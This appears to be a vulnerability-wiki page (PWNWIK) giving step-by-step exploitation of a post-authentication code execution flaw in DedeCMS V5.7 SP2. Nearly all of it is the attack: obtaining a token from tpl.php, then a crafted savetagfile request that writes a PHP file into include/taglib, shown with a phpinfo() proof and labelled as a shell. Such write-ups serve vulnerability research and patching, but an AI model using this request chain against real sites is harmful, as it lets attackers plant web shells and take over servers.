Loading
0

DedeCMS V5.7 SP2 后台代码执行漏洞/zh-tw

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

漏洞利用

首先获取token: domain + /dede/tpl.php?action=upload

通过查看页面源码即可获得 token

http://127.0.0.1/uploads/dede/tpl.php?action=upload

Token.png

然后访问:

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>

Shell

http://127.0.0.1/include/taglib/secnote.lib.php

PWNWIK.COM